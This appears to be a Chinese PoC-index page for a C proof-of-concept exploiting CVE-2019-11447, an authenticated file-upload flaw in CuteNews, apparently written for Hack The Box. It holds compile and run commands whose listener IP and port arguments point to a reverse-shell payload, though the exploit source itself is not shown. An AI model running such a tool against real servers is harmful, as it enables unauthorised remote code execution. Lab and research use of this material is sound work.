POC详情: babfff293026cf4ea716fcb095305e3b7c200e80

来源
关联漏洞
标题: 编号重复 (CVE-2019-11447)
描述:CutePHP CuteNews是一套新闻管理系统。该系统具有搜索、文件上传管理、访问控制、备份和恢复等功能。 “废弃”请勿使用此编号。原因:此编号与CNNVD-201110-126编号重复,所有使用CNNVD编号的用户请参考CNNVD-201110-126编号。为防止意外使用,此编号中的所有信息已删除。
描述
CVE-2019-11447 written in C
介绍
# CVE-2019-11447 PoC

## Overview
This C program is a proof-of-concept (PoC) for exploiting CVE-2019-11447, an arbitrary file upload vulnerability in CuteNews. This PoC is designed to be used on the Hack The Box platform.

### Usage
Compile the program using gcc:

```bash
gcc -o exploit exploit.c -lcurl
```

Run the compiled program with the following command-line arguments:

```bash
./poc_exploit -t TARGET -u USERNAME -p PASSWORD -lh LISTENER_IP -lp LISTENER_PORT -f FILENAME
```

#### Parameters
-t, --target : Target IP address or domain (required)
-u, --uname : Username (required)
-p, --passw : Password (required)
-lh, --lhost : Listener IP address (required)
-lp, --lport : Listener Port (default: 4444)
-f, --file : Filename for payload WITHOUT extension (default: payload)

#### Example
```bash
./poc_exploit -t example.com -u admin -p pass -lh 192.168.1.1 -lp 4444 -f mypayload
```
文件快照

[4.0K] /data/pocs/babfff293026cf4ea716fcb095305e3b7c200e80 ├── [ 18K] exploit ├── [5.3K] exploit.c ├── [1.5K] LICENSE └── [ 896] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。